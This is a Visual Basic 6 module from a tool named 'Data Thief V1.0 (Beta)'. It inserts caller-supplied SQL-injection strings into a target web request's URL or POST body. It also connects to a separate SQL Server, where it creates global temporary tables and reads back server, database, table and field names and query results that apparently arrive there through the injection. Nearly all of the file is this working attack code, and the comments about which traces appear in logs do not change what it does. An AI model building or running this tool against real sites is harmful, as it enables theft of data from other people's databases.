📄 main.bas
Attribute VB_Name = "Main"
Option Explicit
' Value OpenUrl sends as the User-Agent header on every HTTP request.
' It is a constant, so it is a stable string to search for in web-server
' or proxy logs that record the User-Agent field.
Const USER_AGENT = "Data Thief V1.0 (Beta)"
' Module-level ADO connection: opened by Connect, closed by Disconnect and
' assigned to every Recordset used in this module. Declared "As New", so VB
' creates the object on first use.
Dim Con As New ADODB.Connection
'Open the URL, submitting the data
Public Sub OpenUrl(Url As String, Method As String, PostData As String)
    ' Sends one synchronous HTTP request and shows the response body in FrmHtml.
    '   Url      - target address; spaces are replaced with %20.
    '   Method   - "GET" sends no body; any other value sends PostData as a
    '              form-encoded body.
    '   PostData - request body; spaces are replaced with %20 when it is sent.
    ' Url and PostData are ByRef (the VB default), so the caller's variables
    ' receive the %20 substitutions as well.
    ' Every request carries the constant USER_AGENT header. Spaces are the only
    ' characters that get encoded here.
    Dim HttpParser As New XMLHTTP
    Dim IsGet As Boolean

    Url = Replace(Url, " ", "%20")
    IsGet = (Method = "GET")
    If Not IsGet Then PostData = Replace(PostData, " ", "%20")

    With HttpParser
        ' Third argument False = wait for the response before returning.
        .open Method, Url, False
        .setRequestHeader "User-Agent", USER_AGENT
        If IsGet Then
            .send
        Else
            .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
            .send (PostData)
        End If
    End With

    ' Put the raw response text into the HTML viewer form (WindowState 1 = minimized).
    With FrmHtml
        .TxtHtml.Text = HttpParser.responseText
        .WindowState = 1
        .Show
    End With

    Set HttpParser = Nothing
End Sub
'Get the server names from the temporary table
Public Sub GetServers()
    ' Fills FrmMain.LstLinkedServer with the "name" column of the global
    ' temporary table ##Servers, read over the module connection Con.
    ' How rows get into ##Servers is not shown in this module.
    Dim Rec As New ADODB.Recordset

    Rec.ActiveConnection = Con
    Rec.open "Select name from ##Servers"

    With FrmMain.LstLinkedServer
        .Clear
        Do Until Rec.EOF
            .AddItem Rec.Fields(0)
            Rec.MoveNext
        Loop
    End With

    Rec.Close
End Sub
'Get the database names from the temporary table
Public Sub GetDatabases()
    ' Fills FrmMain.LstDatabases with the "name" column of the global
    ' temporary table ##Databases, read over the module connection Con.
    ' The rows are only read here; nothing in this routine writes them.
    Dim Rec As New ADODB.Recordset

    Rec.ActiveConnection = Con
    Rec.open "Select name from ##Databases"

    With FrmMain.LstDatabases
        .Clear
        Do Until Rec.EOF
            .AddItem Rec.Fields(0)
            Rec.MoveNext
        Loop
    End With

    Rec.Close
End Sub
'Get the table names from the temporary table
Public Sub GetTables()
    ' Fills FrmMain.LstTables with the "name" column of the global temporary
    ' table ##Tables. The recordset is opened with adLockOptimistic because
    ' each row is deleted right after it is copied to the list, which leaves
    ' ##Tables empty once the loop finishes.
    Dim Rec As New ADODB.Recordset

    Rec.ActiveConnection = Con
    Rec.open "Select name from ##Tables", , , adLockOptimistic

    With FrmMain.LstTables
        .Clear
        Do Until Rec.EOF
            .AddItem Rec.Fields(0)
            Rec.Delete
            Rec.MoveNext
        Loop
    End With

    Rec.Close
End Sub
'Get the field names from the temporary table
Public Sub GetFields()
    ' Fills FrmMain.LstFields with the "name" column of the global temporary
    ' table ##Fields. Rows are deleted as they are read (hence the
    ' adLockOptimistic lock type), so ##Fields is empty afterwards.
    Dim Rec As New ADODB.Recordset

    Rec.ActiveConnection = Con
    Rec.open "Select name from ##Fields", , , adLockOptimistic

    With FrmMain.LstFields
        .Clear
        Do Until Rec.EOF
            .AddItem Rec.Fields(0)
            Rec.Delete
            Rec.MoveNext
        Loop
    End With

    Rec.Close
End Sub
'Get the SQL Server version from temporary table
Public Sub GetVersion()
    ' Shows the contents of the global temporary table ##version in
    ' FrmMain.TxtOutput: the first column's name, a blank line, then every
    ' row as returned by Recordset.GetString. The box is left empty when
    ' the table has no rows.
    Dim Rec As New ADODB.Recordset

    Rec.ActiveConnection = Con
    Rec.open "Select * from ##version"

    With FrmMain.TxtOutput
        .Text = ""
        If Not Rec.EOF Then
            .Text = Rec.Fields(0).Name
            .Text = .Text + vbCrLf + vbCrLf + Rec.GetString
        End If
    End With

    Rec.Close
End Sub
'Get the results of the query from temporary table
Public Sub GetResults()
    ' Shows the contents of the global temporary table ##tableresults in
    ' FrmMain.TxtOutput: a tab-separated header line built from the column
    ' names, then (when rows exist) a blank line and the rows as returned
    ' by Recordset.GetString.
    Dim Rec As New ADODB.Recordset
    Dim Fld As ADODB.Field

    Rec.ActiveConnection = Con
    Rec.open "Select * from ##tableresults"

    With FrmMain.TxtOutput
        .Text = ""
        ' The header is written even when the table holds no rows.
        For Each Fld In Rec.Fields
            .Text = .Text + Fld.Name + vbTab
        Next Fld
        If Not Rec.EOF Then
            .Text = .Text + vbCrLf + vbCrLf + Rec.GetString
        End If
    End With

    Rec.Close
End Sub
Public Sub Connect(Server As String, Uid As String, Pwd As String, Port As String)
    ' Opens the module connection Con to a SQL Server at Server,Port through
    ' the SQLOLEDB provider over the TCP/IP network library (DBMSSOCN), with
    ' SQL authentication (Uid/Pwd) and a 10-second connect timeout.
    ' Does nothing when Con already has a connection string.
    ' The password is placed in the connection string in clear text.
    If Con <> "" Then Exit Sub

    With Con
        .ConnectionString = "provider=sqloledb;Network=DBMSSOCN;Address=" & Server & "," & Port & ";uid=" & Uid & ";pwd=" & Pwd & ";"
        .ConnectionTimeout = 10
        .open
    End With
End Sub
Public Sub Disconnect()
    ' Closes the module connection when it has a connection string, then
    ' releases the object. Con is declared "As New", so the next reference
    ' to it creates a fresh, unconfigured connection object.
    If Con <> "" Then
        Con.Close
    End If
    Set Con = Nothing
End Sub
'Create temporary tables to hold the data
Public Sub CreateTables()
    ' Drops (when present) and recreates five global temporary tables on the
    ' server reached through Con: ##version, ##servers, ##databases, ##tables
    ' and ##fields. The Get* routines in this module read from these tables.
    ' The names are fixed, so their presence in tempdb is something an
    ' administrator of that server can look for.
    Dim Rec As New ADODB.Recordset
    Dim Statements As Variant
    Dim Statement As Variant

    ' Executed strictly in this order: each drop precedes its create.
    Statements = Array( _
        "if object_id('tempdb..##version') is not null drop table ##version ", _
        "create table ##version (VERSION varchar(500))", _
        "if object_id('tempdb..##servers') is not null drop table ##servers ", _
        "create table ##servers (name varchar(128))", _
        "if object_id('tempdb..##databases') is not null drop table ##databases ", _
        "create table ##databases (name varchar(128))", _
        "if object_id('tempdb..##tables') is not null drop table ##tables ", _
        "create table ##tables (name varchar(128))", _
        "if object_id('tempdb..##fields') is not null drop table ##fields ", _
        "create table ##fields (name varchar(128))")

    Rec.ActiveConnection = Con
    For Each Statement In Statements
        Rec.open Statement
    Next Statement
End Sub
'Create a temporary table to hold query results
Public Sub CreateTableResults(Fields As String)
' Drops (when present) and recreates the global temporary table
' ##tableresults on the server reached through Con, with one column per
' comma-separated name in Fields. Every column is typed sql_variant.
' Fields is concatenated into the CREATE TABLE statement as-is: the names
' are neither quoted nor validated here.
Dim Rec As New ADODB.Recordset
Dim StrArray() As String
Dim Query As String
' Loop counter is a Byte, so it cannot count past 255 column names.
Dim i As Byte
StrArray = Split(Fields, ",")
Query = "create table ##tableresults ("
If UBound(StrArray) = 0 Then
' Exactly one name: emit the single column and close the list.
Query = Query + StrArray(0) + " sql_variant)"
Else
For i = 0 To UBound(StrArray)
' Default column type; comment this line out when the server is SQL Server 7.
Query = Query + StrArray(i) + " sql_variant,"
' Alternative column type; uncomment this line when the server is SQL Server 7.
'Query = Query + StrArray(i) + " varchar(8000),"
Next i
' Replace the trailing comma with the closing parenthesis.
Query = Left(Query, Len(Query) - 1) + ")"
End If
Rec.ActiveConnection = Con
Rec.open "if object_id('tempdb..##tableresults') is not null drop table ##tableresults "
Rec.open Query
End Sub
'Submit data
Public Sub SubmitInjection(Url As String, Method As String, PostData As String, InjectionStr As String)
    ' Replaces every occurrence of the marker "<***>" with InjectionStr and
    ' hands the request to OpenUrl. For Method = "POST" the marker is replaced
    ' in PostData (request body); for any other method it is replaced in Url.
    ' Url and PostData are ByRef (the VB default), so the caller's variables
    ' are modified too.
    ' Log-review note: in the non-POST case the substituted text is part of
    ' the requested URL; in the POST case it is only in the body, which
    ' typical access logs do not record.
    Select Case Method
        Case "POST"
            PostData = Replace(PostData, "<***>", InjectionStr)
        Case Else
            Url = Replace(Url, "<***>", InjectionStr)
    End Select

    OpenUrl Url, Method, PostData
End Sub